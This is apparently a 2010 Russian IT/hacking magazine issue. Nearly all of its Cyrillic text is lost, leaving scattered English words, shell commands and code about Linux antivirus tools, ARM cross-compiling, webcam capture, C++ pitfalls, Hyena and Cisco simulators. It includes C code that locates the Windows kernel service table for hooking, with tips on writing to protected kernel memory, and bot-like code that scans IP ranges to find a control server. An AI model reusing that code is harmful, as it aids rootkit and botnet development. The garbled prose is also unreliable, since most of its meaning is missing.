Dr.Web Linux
AVG LiveCD
$ /opt/drweb/drweb ./
,
ini-, :
$ /opt/drweb/drweb -ini=/home/adept/.drweb/
drweb32.ini ./
, 799
(GTK) CLI , DE, ,
.
,
Linux-.
Dr.Web, ,
Linux- .
. Linux Workstation , Kaspersky Total Space Security, Kaspersky
Enterprise Space Security, Kaspersky Business Space Security
Kaspersky Work Space Security ( 7700 ).
Linux
(5.7.26) 2008. deb
rpm, 32-, 64-.
( ), ,
webim kavmonitor (

). , kavmonitor
2.6.21 ( 32- ) 2.6.18 ( 64-),
-
. ,
CLI. :
$ sudo /opt/kaspersky/kav4ws/bin/kav4wskavscanner /tmp
:
$ sudo /opt/kaspersky/kav4ws/bin/kav4wskeepup2date
/etc/opt/
kaspersky/kav4ws.conf.
ESET Linux- (ESET
X 07 /138/ 10
NOD32 Antivirus 4 for Linux Desktop), , ,

-. -
.
, ,
. x86
x86-64, . /opt/eset.
GTK
,
. , : Setup (
) Tools ( ,
). CLI-, :
$ /opt/eset/esets/sbin/esets_scan ./
'-h' .
,
Linux- McAfee. ,
Linux-,
( , , -
IIS , :)). All-in-one

Linux: LinuxShield (,
) VirusScan Command Line Scanner for
Linux. LinuxShield 2 .
Command Line Scanner Linux (x86 x86-64),
: Windows, FreeBSD,
Solaris, HP-UX AIX. McAfee
,
11
, , , . Command Line Scanner
install-uvscan .
(
)
. , Ubuntu 10.04 ,
libstdc++.so.5.
(http://packages.debian.org/stable/base/libstdc++5).
, -
.
.
:
HTTP://WWW
links
products.drweb.
com/linux Dr.Web
Linux
www.freedrweb.
com/livecd Dr.Web
LiveCD
www.kaspersky.
ru/anti-virus_linux_workstation

Linux Workstation
beta.eset.com/linux
NOD32 Linux
www.bitdefender.
com/world/business/
antivirus-for-unices.
html BitDefender
Linux
free.avg.com/gb-en/
download.prd-afl
AVG Free Edition for
Linux
www.avast.com/
linux-home-edition
avast! Linux Home
Edition
www.clamav.net
ClamAV
code.google.com/p/
viavre/ ViAvRe
INFO
info
ClamAV
2008 (

).
097
UNIXOID
DAZUKOFS
. -,
DazukoFS ( Dateizugriffskontrolle, ) , . DazukoFS
, , ,
. DazukoFS
.
Dazuko
GPL Avira GmbH. , DazukoFS,
.

$ uvsan ./
man uvscan
. LinuxShield
RHEL SLED, (, , ) . - . , 2.6.18.

( Linux-). , , BitDefender.
BitDefender Antivirus Scanner for Unices
.
, , for personal usage only.
BitDefender : deb- rpm, ipk ( ) tbz FreeBSD.
32-, 64- . 128 .
, .
GUI ( DE), CLI.
:
. ,
32-.
( : ;
: www.avast.com/registration-free-antivirus.php). GUI,
CLI-. :
$ avast ./
$ bdscan ./
:
:
$ sudo avast-update
$ sudo bdscan --update
, man bdscan .
AVG.
Linux (deb, rpm, sh . ,
32-) FreeBSD ( x86). 9-
, 8.5 ( 2010), .
.
: (RedirFS Dazuko).
, CLI.
:
$ avgscan ./
:
$ sudo avgupdate
avast. . deb, rpm

. , 32-.
DE. avastgui.
098
,
F-PROT. Linux: F-PROT Antivirus for Linux
Workstations. Linux (i386, x86-64 PowerPC), FreeBSD,
Solaris ( SPARC Intel) AIX. Linux (6.0.3)
2009 .
install-f-prot.pl. /usr/local/bin (
,
F-Prot, , ,
-, , /opt).

. :
$ fpscan /
: , (
30), ..
( man fpsan).
fpupdate ( ).
( )
OpenSource clamav. GUI
X 07 /138/ 10
Dr.Web LiveCD
- NOD32
LiveCD
(clamtk GTK klamav kde).
DazukoFS. ,
.
, ,
. !

LiveCD ,
-
, . ,

LiveCD,
. , Dr.Web
LiveCD. (5.02) ,
- ( ). ,
6 Linux LiveCD .
, (, , 2.6.30), LiveCD
drweb ,

. SafeMode
.
X 07 /138/ 10
KAV2010
Dr.Web, LiveCD , .
! :) LiveCD : http://
devbuilds.kaspersky-labs.com/devbuilds/RescueDisk10. LiveCD . ,
Gentoo 2.6.31, .
GUI ( kav 2010)
.
AVG LiveCD. , , , ,
( ). LiveCD,
.
, ,
FAT NTFS, . (
arl ),
.
(Windows Registry Editor).
, . , ViAvRe (Virtual Antivirus Rechecker),
: Avg, Avast, Doctor
Web (CureIt), McAfee, BitDefender, F-Prot.
, .
(04.10, ) OpenSuse 11.2
SuSeStudio.
viavre-update,
. LiveCD
: full KDE ( 768 ) light LXDE (
mcafee, avg, firefox, virtualbox k3b;
256 ).
WARNING
warning
,
LiveCD
.

,

.
DVD
dvd

LiveCD.
,
:).
, Linux, .
, , Panda DesktopSecure for Linux
Avira. ,
- .z
099
UNIXOID
diver@edu.ioffe.ru, ICQ 308229460
FriendlyArm Android
:

-x86
- Linux
.
Intel' x86.

, ,
. ,
embedded ( ) - GNU/Linux
, , - Windows.
,
.
,
100
:
- . ,
, - -
.

:
. ,
X 07 /138/ 10
Linux-
,
. GNU/Linux
,
Make-.
, ,
.
, - .
Make- ,
Unix-.

Linux-box'.

Linux, ( bare metal), , .
.
,

, ,

embedded-! , !
,
- -- ,
. ,
, ? , , -
! ,
,
.
GUI-
.
,
Wine,
(: USB-
Silabs C8051: http://ec2drv.sourceforge.net). ,
Windows-, GNU- .
X 07 /138/ 10

,
embedded-?

,
.
,
, ( IDE Integrated Desktop Environment).
, ,
. .
Code::Blocks (www.codeblocks.org).
, . , ,
make-
IDE.
, ,
. ,
2008 , ,
svn.
Eclipse (www.eclipse.org). , Java, ,
.
,
. Vim/Emacs.

. . , -

.
gedit, kate.
.
, .
HTTP://WWW
links
http://wiki.starterkit.
ru/cross_compiler

crosstoolng.
http://wiki.openembedded.net

.
INFO
info
JTAG

.

,

.
,
. .
GNU GCC. , , GCC,
Linux-. , ,
, , .
101
UNIXOID

.
U-boot. ,
USB
(Xmodem).
,
.
,
, JTAG. : ,
.
, ,
. SDCC Small Devices
C Compiler.
Intel MCS51, AVR, HC08, PIC Z80.
8051 Keil.
. Keil, .
Wine . , .
. ,
.
,
.
, - , ,
ARM-. GCC :
arm-linux arm-gcc. , ,
Linux,
. ,
.
, ,
, Linux ,
.
, , . , Linux
.
,
. :
$ vi hello.c
#include <stdio.h>
int main (){
printf("Hello world!\n");
}
:
$ arm-linux-gcc -o hello hello.c
$ file hello
hello: ELF 32-bit LSB executable, ARM, version 1,
statically linked, not stripped
, ,
, .
Make-,
make. :
$ CC=arm-linux-gcc make
configure, , , :
102

$ CC=arm-linux-gnu-cc ./configure --host=arm
,
? PC
PC-, - !
, . , . -
, apt-get install libncurses5-dev
. ,
,
.
Debian, , - . , ,
,
.
,
, , . , embedded-
uclibc
glibc. ,
, . ,
Dependency Hell,
,
-.
, - ,
,
.
, ,
? ,
.
, ,
,
, , ,
. ,
,
, , :
$ ls
startup.S main.c sdram.lds
$ arm-elf-gcc -Os -march=armv4t -c \
-o startup.o startup.S
$ arm-elf-gcc -Os -march=armv4t -c -o main.o main.c
$ arm-elf-gcc -T"sdram.lds" -s -Os -march=armv4t \
-nostartfiles -nostdlib -o firmare.elf startup.o main.o
$ arm-elf-objcopy --strip-debug --strip-unneeded \
firmware.elf -O binary firmware.bin
X 07 /138/ 10
- Linux-
FriendlyARM (http://friendlyarm.net).
, Mini2440, Samsung
s3c2440 LCD-. , 150 .
, , .
,
, . "-Os"
,
"-march=armv4t"
ARMv4. ,
,
.
. "-Tsdram.lds". lds
. , , , ,
. ,
x86-, gcc -
. . , ,
lds, .
,
,

. , ,
, ,
ELF ( PE ), .
ELF-,
, ! ELF-
, .
,
. , ,
.
,
. -
. , .
. , jffs2-
Ethernet/
Xmodem/SD-card/-.
.
, ?
. ,
- (, JTAG I2C).
. ,
.
X 07 /138/ 10

ARM-
Openocd (http://openocd.berlios.de) ,
ARM MIPS- JTAG.
. Must have.
, C2 JTAG- SiLabs
linux- http://wiki.
enneenne.com/index.php/Silicon_C2_Interface
Ec2drv (http://ec2drv.sourceforge.net).
Eep24c
I2- EEPROM.
LPT-. avrdude/
avrprog/uisp/dfu-programmer Atmel AVR.
, .
,
- .
Windows-
, .
.

gcc- ,
. ,
.
Emdebian (emdebian.org), .
Debian, , ,
. Ubuntu (, !)
-x86 , ,
.

/,
crosstool-ng (http://ymorin.is-a-geek.org/
projects/crosstool). ,
, .
,
-.
__EXIT()
, . ,
, . ,
, embedded-..z
103
CODING
stannic.man@gmail.com

WINDOWS
,
Windows, ,
.
, , .
, ,
, ,
.
.
,

Rustocka TDSS,
. , , ,

.
, - .
, , ,
, (
, ).
. :
,
, , ,
.
, - - .
- ! ,
,

. , .

, kernel-based -
, ,
. ,
,
?
, Windows, /, , , ,
, , KeServiceDescriptorTable/
104
KeServiceDescriptorTableShadow,
.
KESERVICEDESCRIPTORTABLE

, . ,
,
KeServiceDescriptorTable
, ,
NtCreateFile, NtCreateProcess, NtCreateThread ..
, ,
( , ,
). , ,
- ,
KeServiceDescriptorTable -, .
(F-Secure, , NtLoadDriver)
( COMODO Internet Security Outpost).
, , . , Kaspersky AV (?) SSDT,

. KeServiceDescriptorTable
KeServiceDescriptorTableShadow.
win32k.sys, , ,
, Windows.
Win32k.sys : NtUser* NtGdi*,
, .
, Win32k
: ,
KeServiceDescriptorTableShadow NtUserFindWindowEx,
NtUserQueryWindow, NtUserGetForegroundWindow
windows-.
KeServiceDescriptorTable.
, : extern PVOID KeServiceDescriptorTable.
KeServiceDescriptorTableShadow , , .
X 07 /138/ 10
>> coding
DVD
dvd
, ? ?
SSDT ,
. ,
, . ZwOpenFile/ZwCreateSection/ZwMapViewOfSection

ntoskernl.exe (ntkrnlpa.exe
).
KeServiceDescriptorTable,
.
KiServiceTable
ULONG FindKiServiceTable(
ULONG SdtPtr,
ULONG Handle)
{
ULONG bFirst = 1, RvaPtr, i;
pointer = (char *)Handle;
pointer += 0x3c;
pointer = (char *)(*(ULONG *)pointer)
+ Handle + 0xA0;
reloc = (PIMAGE_BASE_RELOCATION)(char *)
(*(ULONG *)pointer) + Handle);
while ((bFirst)
||(reloc-> VirtualAddress))
{
bFirst = 0;
fixup = (PIMAGE_FIXUP_ENTRY)
((ULONG)reloc + 8);
for (i=0;i<(reloc->SizeOfBlock - 8)>>1;
i++, fixup++)
if ( fixup->type == 3)
{
X 07 /138/ 10
RvaPtr = reloc->VirtualAddress +
fixup->offset;
if (*(PULONG)( Handle + RvaPtr) 0x400000 == SdtPtr)
{
if (*(PUSHORT)( Handle + RvaPtr - 2)
== 0x05c7)
return (*(PULONG)( Handle + RvaPtr
+ 4) - 0x400000 + Handle);
}
}
*(PULONG)&reloc += reloc->SizeOfBlock;
}
return 0;

WRK Windows
Research Kernel,

Windows.

Windows :).
HTTP://WWW
links
,

wasm.ru
http://rsdn.ru/
forum/asm
}
}
, ,
, SSDT , ,
.
,
NtCreateSection NtMapViewOfSection,
. , .
, SSDT ShadowSSDT,
.
POSITION NUMBER TWO
,
.
KeServiceDescriptorTableShadow,
KTHREAD. ,
105
CODING
KeServiceDescriptorTableShadow
, KeServiceDescriptorTable.
, KTHREAD.ServiceDescriptorTable

KeServiceDescriptorTable. !
.
? ETHREAD,
KTHREAD ( ),
PsLookupThreadByThreadId (
PsLookupProcessThreadByCid), , :
__asm push esi;
__asm mov esi, fs:[0x124].
esi
ETHREAD. , , .
POSITION NUMBER
:
( , :)). , ,
Windows. ,
PTE ,

NtWriteVirtualMemory. ? ,
?
, KeServiceDescriptorTable
, ,
, PTE.
:
. :
ULONG_PTR GetPhysicalAddress(
IN ULONG_PTR VirtualAddress)
{
return (VirtualAddress & 0x1FFFFFFF);
}
106
? .
Windows . CreateFile/
ReadFile/WriteFile. ,
Windows . , , ,
,
. , .
. NT),
.
:
WRK (Windows Research Kernel), ,
,
.
, , , SFC,
, , ,
. . ? , . ,
Windows - Linux
,
.
WRK .
, , ,
.
PRO & CONS
, . ,
,
. , ,
.
,
. , , :). proof of concept.
, ! z
X 07 /138/ 10
>> coding
RankoR ax-soft.ru
02
01
WINDOWS
03
$$
WINDOWS
#irc
WINDOWS

][
, , ,
.
,
.
][,
QTss-Brute . ,
: RDP,
:). !
,
. ? -
, , .
, xxx.xxx.0.0-xxx.xxx.255.255
10-100 . ,
.
, . , ,
. IP .
, , (!)
. , , ,
. :
, .
, , , :).
X 07 /138/ 10
, IP
,
.
,
, , .
, ?
. , , .
, . MS Visual Studio 2008

C ( C, C++!),
Intel. ? 2010
(MSI Wind u90) , , , . , Intel
, - , ,
Microsoft .
, .
Win32 Console Application ( ,
107
CODING
04
WINDOWS
#irc
WINDOWS
LOW
INTEREST
RATES!!
GIMME
CREDIT
CARDS
EXTEND
YOUR
PENIS
GET
A BETTER
JOB
#irc
CHEAP
MOVIE
TICKETS
#irc
IRC-
DVD
dvd

(
)
WARNING
warning

.
,
,
,

,
,
.
Win32 Application).
TCP/IP,
winsock2.
( ,
),
.
:

getServer();
getRange();
while ( true )
{
sock = tcp_connect(srv, PORT);
if ( sock > 0 ) {
/*..SOME MAGIC..*/
} else { // Server is dead!!!!111
range = getRange();
server = findServer((char*) range);
if ( server == NULL )
continue;
memcpy(srv, server, 20);
}
Sleep(1000);
}
findServer()
char *findServer(
const char *fIP
)
{
Range range;
char *server;
memcpy(range.startIP, fIP, 3);
memcpy(range.endIP, fIP, 3);
range.startIP[3] = 0;
range.endIP[3] = 255;
server = scanRoutine(&range);
if ( server )
return server;
if ( server )
return server;
(, , ?)
.
- ,

.
return server;
// Returning pointer anyway (NULL too)
metal, DieHard, YaesU, DjFly, Miracle,

}
108
X 07 /138/ 10
>> coding
scanRoutine()
char *scanRoutine(
const Range *range)
{
unsigned int a, b, c, d;
char *server, data[8];
SOCKET sock;
server = (char*) malloc(20);
d
c
b
a
=
=
=
=
range->startIP[3];
range->startIP[2];
range->startIP[1];
range->startIP[0];
while ( true )
{
if ( d > 255 )
d = 0, c++;
if ( c > range->endIP[2] &&
b == range->endIP[1] )
break;
if ( c > 255 )
c = 0, b++;
if ( b > range->endIP[1] &&
a == range->endIP[0] )
break;
if ( b > 255 )
b = 0, a++;

getRange() IP (
, , , ) ,
. getServer() , .
findServer()
(. ). , IP 192.168.1.1.
192.168.0.0-192.168.255.255.
192.0.0.0-192.255.255.255,
0.0.0.0-255.255.255.255.
( ) .
range:
sprintf(server, %u.%u.%u.%u, a, b, c, d);

sock = tcp_connect(server, PORT);
typedef struct
{
unsigned char startIP[4], endIP[4];
} Range;
if ( sock > 0 )
{
// OK, port is open, now check it!
if ( tcp_send(sock, cliHello, 8) < 0 )
continue;
IP
( , unsigned char).
, . , ,
.
cliHello srvHello:
tcp_recv(sock, data, 8);

if ( memcmp(data, srvHello, 8) )
continue;
closesocket(sock);
return server;
// Thats ok!!!
const char cliHello[] = "\xD\xE\xA\xD\xB\xE\xE\xF";

const char srvHello[] = "\xF\xE\xE\xB\xD\xA\xE\xD";
, cliHello, srvHello. ,
, srvHello ,
.
.
IP . cliRange
:
const char cliRange[] = "\xA\xB\xC\xD";
, .
, !
X 07 /138/ 10
}
d++;
}
free(server);
return NULL;
}
. , .exe
12.5 , C C.
. ,
( ..) :). , .
, . , ,
. ! z
109
CODING
http://vr-online.ru
-

-
, .
,
. . ,
-
, .
:

, ,
.NET Framework
-. ( SilverLight- ), , VS2010 4- .NETa.
, .
,
MSDN DirectDraw. , - DirectDraw
.
, .
,
. ,
. ( ).
DirectDraw,
. .
, .
DirectDraw, .
- ,
VFW (Video For Windows). , (
) . , -
110
-.
,
. , ,
, . , win-
WinAPI . - -
-
Delphi. .
, .
, 1
, /
-. .
.
.
. .
, .
, ,
,
.
WindowsAPI capGetDriverDescription(). :
1. wDriverIndex .
0 9;
X 07 /138/ 10
>> coding
WinAPI .NET
d.Name = dName.Trim();
d.Version = dVersion.Trim();
devices.Add(d);
,
!
}
}
2. lpszName , ;
3. cbName ( ) lpszName;
4. lpszVer ,
;
5. cbVer ( ),
.
TRUE.
, , C#. :
[DllImport("avicap32.dll")]
protected
static
extern bool capGetDriverDescriptionA(
short wDriverIndex,
[MarshalAs(UnmanagedType.VBByRefStr)]
ref String lpszName,
int cbName,
[MarshalAs(UnmanagedType.VBByRefStr)]
ref String lpszVer,
int cbVer);
, , , DLL, .
avicap32.dll. , ,
, .

, :
public static Device[]
GetAllCapturesDevices()
{
String dName = "".PadRight(100);
String dVersion = "".PadRight(100);
for (short i = 0; i < 10; i++)
{
if (capGetDriverDescriptionA(i,
ref dName, 100,
ref dVersion, 100))
{
Device d = new Device(i);
X 07 /138/ 10
return (Device[])devices.ToArray(
typeof(Device));
}
.
,
capGetDriverDescription.
MSDN , (
capGetDriverDescription()) 0 9,
.
Device
( ,
).
,
.
capCreateCaptureWindow(),
.
, ,

. , , windows- (
) SendMessage().

capCreateCaptureWindow().
:
1. lpszWindowName - , ;
2. dwStyle ;
3. x X;
3. y Y;
4. nWidth ;
5. nHeight ;
6. hWnd handle ;
7. nID .
handle
NULL .
WinAPI,
- . , ,
capGetDriverDescription().
:
HTTP://WWW
links
blogs.msdn.com

Silverlight
4 real-time Face
Detection (

SilverLight).
facelight.codeplex.
com
Facelight,
.

,

.
www.aforgenet.
com/framework
AForge
.NET

, ..
vr-online.ru
,

VROnline.
111
CODING
!
!
deviceHandle = capCreateCaptureWindowA(
ref deviceIndex, WS_VISIBLE | WS_CHILD, 0, 0,
windowWidth, windowHeight, handle, 0);
if (SendMessage(deviceHandle,
WM_CAP_DRIVER_CONNECT, this.index, 0) > 0)
{
SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEWRATE,
0x42, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEW, -1, 0);
SetWindowPos(deviceHandle, 1, 0, 0,
windowWidth, windowHeight, 6);
}

WM_CAP_DRIVER_CONNECT.
.
,
: WM_CAP_SET_
SCALE, WM_CAP_SET_PREVIEWRATE, WM_CAP_SET_PREVIEW. ,
, C#
. .

.
- . ,

. ,
.
(, ) :
GetAllDevices ( ), GetDevice (
), ShowWindow (
-), GetFrame (
) GetCapture ( ).

( ). ComboBox (
)
, , . ,
Image.
. .
. :
112
//
private const int WM_CAP = 0x400;
//
private const int WM_CAP_DRIVER_CONNECT = 0x40a;
//
private const int WM_CAP_DRIVER_DISCONNECT = 0x40b;
//
private const int WM_CAP_EDIT_COPY = 0x41e;
///
private const int WM_CAP_SET_PREVIEW = 0x432;
///
private const int WM_CAP_SET_OVERLAY = 0x433;
// previewrate
private const int WM_CAP_SET_PREVIEWRATE = 0x434;
///
private const int WM_CAP_SET_SCALE = 0x435;
private const int WS_CHILD = 0x40000000;
private const int WS_VISIBLE = 0x10000000;
// callback- preview
private const int WM_CAP_SET_CALLBACK_FRAME = 0x405;
//
private const int WM_CAP_GRAB_FRAME = 0x43c;
//
private const int WM_CAP_SAVEDIB = 0x419;
Device[] devices = DeviceManager.GetAllDevices();

foreach (Device d in devices)
{
cmbDevices.Items.Add(d);
}
, ?
.
:
Device selectedDevice =
DeviceManager.GetDevice(cmbDevices.SelectedIndex);
selectedDevice.ShowWindow(this.picCapture);
, .
:
Device selectedDevice =
DeviceManager.GetDevice(cmbDevices.SelectedIndex);
selectedDevice.FrameGrabber();
FrameGrabber().

. , ,
.
, ,
.
: .
() ,
X 07 /138/ 10
>> coding

.
,
.NET AForge.NET. AForge.NET
.

: ,
( , ,
, , ), , , ..
. . .
. .
. ,
.
WinAPI ? .
, . ,
. - .NET,
- WinAPI.
. MotionDetector . Bitmap
. :
MotionDetector detector = new MotionDetector(
new TwoFramesDifferenceDetector( ),
new MotionAreaHighlighting( ) );
//
if ( detector != null )
{
float motionLevel = detector.ProcessFrame( image );
if ( motionLevel > motionAlarmLevel )
{
flash = (int)
( 2 * ( 1000 / alarmTimer.Interval ) );
}
if ( detector.MotionProcessingAlgorithm is
BlobCountingObjectsProcessing )
{
BlobCountingObjectsProcessing countingDetector =
(BlobCountingObjectsProcessing)
detector.MotionProcessingAlgorithm;
objectsCountLabel.Text = "Objects: " +
countingDetector.ObjectsCount.ToString( );
}
else
X 07 /138/ 10

{
objectsCountLabel.Text = "";
}
}
(
MotionDetector)
-. ,
( ProcessFrame): motionlevel
motionLevelAlarm (0.015f), , ! .
.
-
- ? , ! http://
codeplex.com ( OpenSource MS)
( ),
-.
.NET
SilverLight.
, .
( , , , ..) SilverLight .
.

.
-
, . Skype-. ,
. . ,
- ,
, ,

:). . z
113
CODING
deeonis deeonis@gmail.com
C++
C++! C
,
, ,
.
.
C++ ,
- .
, .
,
. ,
, .
,
, :

class Shape {
public:
enum ShapeColor { Red, Green, Blue };
virtual void draw(ShapeColor color = Red) comst = 0;
};
class Rectangle: public Shape {
public:
virtual void draw(ShapeColor color = Green) const;
};
class Circle: public Shape {
public:
virtual void draw(ShapeColor color) const;
};
Shape,
draw.
, Shape Rectangle Circle.
114
- .
:
Shape
// Shape*
Shape *ps;
// Shape*
Shape *pc = new Cercle;
// Shape*
Shape *pr = new Rectangle;
ps, pc pr Shape,
.
,
Shape*.
, , . , pc
Circle*, , Circle,
. ( ).

. ,
,
. ,
,
, .

// Circle::draw(Shape::Red)
pc->draw(Shape::Red);
// Rectangle::draw(Shape::Red)
pr->draw(Shape::Red);
// Rectangle::draw(Shape::Red)!
pr->draw();
X 07 /138/ 10
pr Rectangle*, ,
, Rectangle.
Rectangle::draw Green.
pr Shape*,
Shape, Rectangle. ps, pc pr
, . , draw ,
.
C++ ?
.
,
,
,
.
.
, , , ,
-,
, ?

class Shape {
public:
enum ShapeColor { Red, Green, Blue };
virtual void draw(ShapeColor color = Red) comst = 0;
};
class Rectangle: public Shape {
public:
virtual void draw(ShapeColor color = Red) const;
};
.
, .
Shape,
.

.

.
. , ,
(NVI) ,
, .
,
.
, , . , , B,
D. B
mf. , , void. :
D B
class B {
public:
void mf();
X 07 /138/ 10
};
class D: public B {};
, mf .
- ,

.

class D: public B {
public:
// B::mf
void mf();
...
};
D x;
// x
D *pD = &x;
// D::mf
pD->mf();
// x
B *pB = &x;
// B::mf
//
pB->mf();
D, : B
*pB D *pD. mf pD ,

.
pB, mf.
, , B::mf D::mf, . , ,
pB B,
, pB , B, ( )
, B.
,
. mf B
, , .
D::mf, pB pD
D.
, D
mf, B, ,
D , . ,
D mf
D, B,
, .
.

.
( ) C++ , ,
, .
.z
115
SYN/ACK
grinder grinder@synack.ru

HYENA 8.0

, , . , Microsoft, ,
, . Hyena .
HYENA
,
. Windows
, ,
: Radmin, pcAnywhere, Netop, UltraVNC
. .
, ,
, ,
, . , WinRM, PowerShell
SCCM.
(GPO),
. GPO ,

, .

Hyena
-
,
,
. SystemTools Software
Inc. (systemtools.com)

, -
. , , Hyena , .
116

. Hyena
WinNT: User Manager,
Server Manager File Manager/Explorer,
,
MMC.
,
. ,

( ),
, , ,
. MMC
, , ,
.
, , ,
.
Hyena
,
.

MS Access Excel.
Enterprise-,
(
,
30 ), Exchange
Server 5.5/2000/2003,
WMI. Hyena

,
Windows NT 2000 .
Win7
Win2k8R2.
x64-, (PSO, Password Settings
Objects), Win2k8
.
8.
RDP VNC
,
. ,

. ,
Remote Control Manager
(STRCM,
systemtools.com/strcm,
freeware).
: Hyena

,
.
, , .
,
30 .

.
, Next . , Hyena.
,
X 07 /138/ 10
, . Hyena .

, Hyena, . ,
24/7, , Hyena .
.

, ,
(
, , , ).
, ,
.
,
, Enterprise
Windows Network (SMB) Windows.
, ,
,
Hyena . File Add Domain;
.
, Find All Domain,
.

Object Manager Configuration,
. , : File Manage Object View,
Objects, Add Windows
Domain.
, :
, OU, , , URL, ..

, . . ,
, X 07 /138/ 10
: , ,
, (
). ,
, .
, , ,
.
.
(
), ,
.
( , ) Printers. ,
, ,
, /
.
:
.
, ,
( NTFS),
.

. Hyena .

, / . DFS (Distributed File
System)
.
( ),
, /, , Hyena. ,
, , . . , ,
.

. Events.
117
SYN/ACK
Hyena
Filter Events , ,
, .. -
,
:
WMI Execute Query
WMI Query Template Properties, -
Hyena
:
Remote Control
. RCM-,

(
),
,
.
Windows,

.
Hyena :

Account Policy Audit Policy.
: , ,
, .
,
Audit Properties
.

,
, , , .
Hyena ,
. Perfomance
, ,
, , CPU, ,
.
.
, WMI, ,
. -
118
WMI
.

. , WMI

(WMI Create
Proccess).
, (, , ,
..),
.
MS Access

.
Settings Reporting,

Access ( Excel) : Tools Generate
Report.
STRCM
, Hyena
. RDP-

mstsc.exe, . VNC, Remote Control Manager (STRCM),

VNC-. , STRCM ,
GNU GPL.
, Hyena. , ini-,

.
: rd.rcm rd_
admin.rcm RDP-,
vnc*.rcm
VNC.
Tools
Settings Remote dialog, ,
Edit,
.
:
#
[General]
# : RDP VNC
SoftwareType=VNC
#
Enabled=1
#
MenuName=TightVNC
#
AutoExecute=0
#
[View]
#
ViewerCommand=vncviewer.exe
%computer%
# RDP
# ViewerCommand=mstsc.exe
X 07 /138/ 10
WARNING
warning

RDP/VNC,
Remote Control
Manager.
INFO
info
WMI-
tool_cmds.dat,
,
.
(),
New Submenu.

,
.
:
( , , ..)
.
, RCM-

. Hyena
, .
".RCM file
configuration directory path", Hyena.

Hyena
Custom Tools.

,

Ctrl-F[1-9].
Tools Settings Tools,
X 07 /138/ 10
%S% , . "\\",

;
%E% ,
;
%G% , ,
;
%HOSTNAME% NETBIOS DNS-
(
Tools Settings Active Directory Use DNS
computer paths);
%Px% , :
%P1% , %P2% , %P3% ;
%Px:prompt% , ;
%Px:prompt/PWD% , .

][ 03.2010
.
AD
Hyena
RSAT (Remote
Server Administration
Tools)
AdminPak (Microsoft
Administration Tools).
HTTP://WWW
links

systemtools.com
, Hyena ,
. ,

.z
119
SYN/ACK
grinder grinder@synack.ru

CISCO SYSTEMS JUNIPER NETWORKS
, . , ,
.
PACKET TRACERT
: Cisco Systems Inc.
Web: cisco.com/web/learning/netacad/course_
catalog/PacketTracer.html
: Windows XP/Vista/7, Linux (Ubuntu, Fedora)
:
.
Cisco
,

( /) . ,

, .
,
CCNA
(Cisco Certified Network Associate, Cisco ), .
Cisco
Packet Tracert,
Networking Academy,
. :
.
PT ,

.
,
, Cisco (, ,
..). ,
.
,
Cisco (
). , , -
120
.
,

.
,
.
Packet Tracert ,

( ,
). ,
.
,
. .
,
.

.
drag'n'drop
, ,
.. , PT
, ,
Wireless
, .
, .
,
.
,
(, ).
Logical Workspace (Ctrl+L).

,
Physical
Workspace (Ctrl+P). PT
: Realtime
Mode (Ctrl+R) Simulations Mode (Ctrl+S).

. Realtime
, Simulations
,
( , , ..) Activity
Wizard
. , ,

Cisco , .
DYNAMIPS
: OpenSource
Web: http://www.ipflow.utc.fr/index.php/
Cisco_7200_Simulator
: Windows 2k/XP/Vista, x32/x64 Linux, Mac
OS X
: GNU GPL
Dynamips 2005
Cisco 7200

. Dynamips
Cisco
3600, 3700 2600.
: CPU (MIPS64 PowerPC),
RAM (DRAM, Packet SRAM, NVRAM),
. .
,

X 07 /138/ 10
.
, IOS (Internet Operating System)
.

Linux. pcap, Windows WinPCAP.
Ubuntu/Debian :
#
[[7200]]
# IOS-
image = /home/grinder/images/c7200.image
# , RAM,

npe = npe-400
ram = 160
$ sudo apt-get install dynamips
Dynamips , '--help'.
Cisco 7206VXR NPE-200 256 DRAM.
, '-P' (, "-P 3600"). '-t' (
'-t' ).
IOS Cisco, ,
( ,
). IOS- ,
:
$ unzip -p c7200-g6ik8s-mz.124-2.T1.bin > c7200.image
#
[[Router R1]]
# ,
Serial1/0 R1 Serial1/0 R2
s1/0 = R2 s1/0
[[Router R2]]
#
, .
. ,

, :
:
s2/0 = NIO_linux_eth:eth1
$ dynamips c7200.image
Dynamips ,
, .
Dynagen (dynagen.org),
- Dynamips.
, . , ,
.
$ nano v_router.net
# , Dynamips
[localhost]
X 07 /138/ 10
dynamips (
, '&'):
$ sudo dynamips -H 7200
Cisco Router Simulation Platform (version 0.2.8-RC2-amd64)
Copyright (c) 2005-2007 Christophe Fillot.
Build date: May 9 2009 18:06:28
ILT:
ILT:
ILT:
ILT:
loaded
loaded
loaded
loaded
table
table
table
table
"mips64j" from cache.

"mips64e" from cache.
"ppc32j" from cache.
"ppc32e" from cache.
121
SYN/ACK
Packet
Tracker
Packet Tracker realtime-

=> reload R1
,
.
:
IDLE PC
=> list
Name Type State Server Console
R1 7200 running localhost:7200 2000
R2 7200 running localhost:7200 2001
:
Hypervisor TCP control server started
(port 7200).
Dynagen:
$ telnet localhost 2000
,
Console. ,
Dynagen:
$ dynagen v_router.net
Dynagen
*** Warning: Starting R1 with no idlepc value
idle-pc ,
dynagen idlepc get _:
=> idlepc get R1
,
"*".
, ,
idlepc.
.
Dynamips idlepc
'--idle-pc=',
, Dynagen
:
=> telnet R1
(
, dynamips)

.
help, .
help , . <Tab>.
, , , start,
stop, reload, suspend, resume
/all :
idlepc = 0x6076a394
, .

.

. , Dynamips
, ,
.
idlepc IOS-
.
:

Cisco
help
setup
show config
configure terminal
enable [ ]
hostname Router
ip http server -
ip route 172.1.1.0 255.255.255.0 10.1.1.1 permanent
clear ip route *
show ip route
Cisco ,
.
122
,
:
=> idlepc save R1 db
idlepc
:
=> idlepc show R1
, .
,
Dynagen
. , gDynagen (gdynagen.sf.net)

Dynamips + Dynagen.
Dynagen confDynagen (code.google.
com/p/confdynagen)
,
Dynagen ,
.
GNS3
: OpenSource
Web: www.gns3.net
: Windows 2k/XP/Vista, *nix, Mac OS X
: GNU GPL
GNS3 (graphical network simulator)
,
X 07 /138/ 10
WARNING
warning

IOS
idlepc.
GNS3
Network Simulator (isi.edu/nsnam/ns) ,

. nam
(network animator).
Xentaur (xgu.ru/hg/xentaur)
, , Xen.
NetSim (mput.de/projects/code/netsim)
, 3D- .
ProfSIMs (networksims.com), RouterSim
(routersim.com), CertExams.com
(routersimulator.certexams.com) ,
Cisco.

. , ,
Cisco (CCNA, CCNP, CCIP, CCIE) Juniper
Networks (JNCIA, JNCIS, JNCIE). ,
